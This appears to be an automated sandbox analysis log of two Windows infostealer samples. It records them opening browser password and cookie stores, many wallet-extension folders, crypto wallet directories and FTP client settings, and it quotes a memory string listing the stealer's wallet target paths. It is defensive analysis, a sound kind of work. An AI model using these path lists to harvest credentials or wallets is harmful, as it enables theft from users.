Source: Yara match File source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: EE6.exe PID: 1640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Exodus
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: nnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: \\config\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\5876.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\AppData\Local\Temp\5876.exe Directory queried: C:\Users\user\Documents
Source: Yara match File source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: katDDA4.tmp PID: 7360, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 5876.exe PID: 7992, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419307805.0000000002120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1419568302.0000000003C01000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 11.2.EE6.exe.4470000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.4247719.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.44b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.EE6.exe.4247719.0.raw.unpack, type: UNPACKEDPE
